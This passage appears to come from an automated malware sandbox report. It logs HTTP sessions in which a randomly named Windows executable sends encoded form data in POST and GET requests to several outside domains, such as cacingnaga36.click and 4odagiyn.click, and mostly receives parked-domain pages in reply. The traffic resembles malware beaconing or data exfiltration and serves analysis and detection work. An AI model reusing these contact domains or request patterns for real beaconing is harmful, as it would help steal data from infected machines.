                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=984b36d8-9910-49d2-9ffc-9c4d3131bb0f; expires=Thu, 05 Sep 2024 12:42:14 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Timestamp: Sep 5, 2024 14:27:14.189316034 CEST | Bytes transferred: 619 | Direction: IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTg0YjM2ZDgtOTkxMC00OWQyLTlmZmMtOWM0ZDMxMzFiYjBmIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID: 39 | Source IP: 192.168.2.5 | Source Port: 57230 | Destination IP: 199.59.243.226 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp: Sep 5, 2024 14:27:16.684978962 CEST | Bytes transferred: 1778 | Direction: OUT | Data: POST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Timestamp: Sep 5, 2024 14:27:17.145067930 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:16 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1166
                                                    x-request-id: a0b6458c-7ade-480c-8bb4-4b94ae081672
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==
                                                    set-cookie: parking_session=a0b6458c-7ade-480c-8bb4-4b94ae081672; expires=Thu, 05 Sep 2024 12:42:17 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_O0hAOCQUOlv6hWYq6shzqc4ClPWuQw7OFCwO6V1OrDNCX0Pj3GgokDYVoNrX/iBOAeUQIuuMU9Y1b5wdxYMLtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Timestamp: Sep 5, 2024 14:27:17.145093918 CEST | Bytes transferred: 619 | Direction: IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBiNjQ1OGMtN2FkZS00ODBjLThiYjQtNGI5NGFlMDgxNjcyIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID: 40 | Source IP: 192.168.2.5 | Source Port: 57231 | Destination IP: 199.59.243.226 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp: Sep 5, 2024 14:27:19.228796959 CEST | Bytes transferred: 460 | Direction: OUT | Data: GET /2hp8/?V6h=CrdAdyOI+okqqhNVS+pkNdIVKBAkN6pudTJL4uhGXJF2xfVUvgIf08oiVWpA0tvbrxzjqgxPP30FNCXR+uyv/IzX8n7qYYw/tQbLXhwufDNvpebHNpaSdeQxoKtamMn3yA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Timestamp: Sep 5, 2024 14:27:19.681514978 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:18 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1530
                                                    x-request-id: 29f4215d-eb7c-49ea-b68c-c4bbe149eb2d
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OM9/aPIfoKgkWuE+SC1ftqvGP91tnxFn8Y41xfiYLCK0C4fjk/cOhmpSxFXI4G01MyTlPE/8f1NZsDmZd3WKTw==
                                                    set-cookie: parking_session=29f4215d-eb7c-49ea-b68c-c4bbe149eb2d; expires=Thu, 05 Sep 2024 12:42:19 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OM9/aPIfoKgkWuE+SC1ftqvGP91tnxFn8Y41xfiYLCK0C4fjk/cOhmpSxFXI4G01MyTlPE/8f1NZsDmZd3WKTw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Timestamp: Sep 5, 2024 14:27:19.681539059 CEST | Bytes transferred: 983 | Direction: IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjlmNDIxNWQtZWI3Yy00OWVhLWI2OGMtYzRiYmUxNDllYjJkIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID: 41 | Source IP: 192.168.2.5 | Source Port: 57232 | Destination IP: 199.59.243.226 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp: Sep 5, 2024 14:27:33.075530052 CEST | Bytes transferred: 720 | Direction: OUT | Data: POST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=JU6WbGx+XQK8iX2ObfC/5m3aLSbAv9Hd2qqCIT0ExrpZN3IueWHSF2S0Tq1rd1pdj6SS9F+u482PrdKpNMbKcrhqpfRQ71c5T+f+yyd4LVHHkN43rHg4VcgO83rCUot+SSPTBO/yZDZAy80cs0LdUeyoTD6TQZm6RhuyIGmw0SSwuXKkxobxWHeWNRb3KQ6PJWSCeUI=
                                                    Timestamp: Sep 5, 2024 14:27:33.552771091 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:32 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 57d986a7-7db3-4fbc-9ff8-55f64b9dc90e
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=57d986a7-7db3-4fbc-9ff8-55f64b9dc90e; expires=Thu, 05 Sep 2024 12:42:33 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Timestamp: Sep 5, 2024 14:27:33.552799940 CEST | Bytes transferred: 591 | Direction: IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTdkOTg2YTctN2RiMy00ZmJjLTlmZjgtNTVmNjRiOWRjOTBlIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID: 42 | Source IP: 192.168.2.5 | Source Port: 57233 | Destination IP: 199.59.243.226 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp: Sep 5, 2024 14:27:35.625698090 CEST | Bytes transferred: 740 | Direction: OUT | Data: POST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=JU6WbGx+XQK8g2mOa8q/xm3VEybAhdHR2q2CISwUyZNZNW4uMDnSG2S0YK0gAlpWj6ea9ECu44WPrd6pN+zJc7hoi/Re/1c5T+f+yygtLUjHl9o3qmg7LMgPqnrCF4t6SSPxBPivZBRAy8Ecsh/eeeyuXD7SXr7zdSv+UkT4jUSmmBnOrKTZFnyudCTAbgbmT1CyADeOY8vAukOn3ejI1SFkgCNB
                                                    Timestamp: Sep 5, 2024 14:27:36.110003948 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:35 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 153569f9-e0b6-4531-a87c-c4338f5fe676
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=153569f9-e0b6-4531-a87c-c4338f5fe676; expires=Thu, 05 Sep 2024 12:42:36 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Timestamp: Sep 5, 2024 14:27:36.110493898 CEST | Bytes transferred: 591 | Direction: IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTUzNTY5ZjktZTBiNi00NTMxLWE4N2MtYzQzMzhmNWZlNjc2IiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID: 43 | Source IP: 192.168.2.5 | Source Port: 57234 | Destination IP: 199.59.243.226 | Destination Port: 80 | PID: 2672 | Process: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp: Sep 5, 2024 14:27:38.170308113 CEST | Bytes transferred: 1757 | Direction: OUT | Data: POST /ssw0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.cacingnaga36.click
                                                    Referer: http://www.cacingnaga36.click/ssw0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Timestamp: Sep 5, 2024 14:27:38.652837992 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:37 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1138
                                                    x-request-id: 757930bf-d9a9-4d20-aa0d-ef6517632529
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==
                                                    set-cookie: parking_session=757930bf-d9a9-4d20-aa0d-ef6517632529; expires=Thu, 05 Sep 2024 12:42:38 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u/9I+DT0iYWcP+AQovl7Oy+VE4cOwOA7IVVo63RYsT211lfM9hIKCOQnspWMpm2yg6zG0u3MRQCkcGAzzZvsbA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:38.652857065 CEST | 591 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzU3OTMwYmYtZDlhOS00ZDIwLWFhMGQtZWY2NTE3NjMyNTI5IiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    44 | 192.168.2.5 | 57235 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:40.715140104 CEST | 453 | OUT | GET /ssw0/?V6h=EWS2YwJnJiunoUuFc/7D9RbaJ3v4wM/73ZiSCzwa3KkaAEYrAxr2MHaEXaA/BV5/vIbe5XGczNGh+M2iNsrtVcMRpqBE9VdECLv8jlI9PFfIoqokrAMGKtNOgnbIBrYWGQ==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.cacingnaga36.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:41.175417900 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:40 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1514
                                                    x-request-id: 8941a0cf-b407-4c0b-917a-5a89df90e72b
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tw+b0uDS7S9ov7Mr2xZBdYCvgHdYca71/64PfR7jKpOVyZTg7gU8z6e3VTTui3DgkKWb1AvJCbm9M69xRuDOdw==
                                                    set-cookie: parking_session=8941a0cf-b407-4c0b-917a-5a89df90e72b; expires=Thu, 05 Sep 2024 12:42:41 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tw+b0uDS7S9ov7Mr2xZBdYCvgHdYca71/64PfR7jKpOVyZTg7gU8z6e3VTTui3DgkKWb1AvJCbm9M69xRuDOdw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:41.175461054 CEST | 967 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODk0MWEwY2YtYjQwNy00YzBiLTkxN2EtNWE4OWRmOTBlNzJiIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    45 | 192.168.2.5 | 57236 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:49.244653940 CEST | 457 | OUT | GET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.whiskeydecanterset.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:49.708673954 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:27:48 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1522
                                                    x-request-id: 0f5c48c8-e287-40c8-8918-684fe455930c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==
                                                    set-cookie: parking_session=0f5c48c8-e287-40c8-8918-684fe455930c; expires=Thu, 05 Sep 2024 12:42:49 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:27:49.709034920 CEST | 975 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY1YzQ4YzgtZTI4Ny00MGM4LTg5MTgtNjg0ZmU0NTU5MzBjIiwicGFnZV90aW1lIjoxNzI1NTM5Mj


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    46 | 192.168.2.5 | 57237 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:54.728523970 CEST | 708 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.5 | 57238 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:57.260699987 CEST | 728 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UrzDinZE8j1PBKFziS4BDf9AL+5MQA+t2hc0PwLVRcuP3v3O+0GkzMrUHrhcphw3vbFBbqEdWaJSxtByfjaml6sfltwzXahZjLXQS1fiRe6tgMFuvITnf/tbOvCT9eAMpzeTLgAnOZL8U+Y2+A+B8pVt8S/pcfHOPPYiM45k4wElMYCaE40


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    48 | 192.168.2.5 | 57239 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:27:59.794142008 CEST | 1745 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
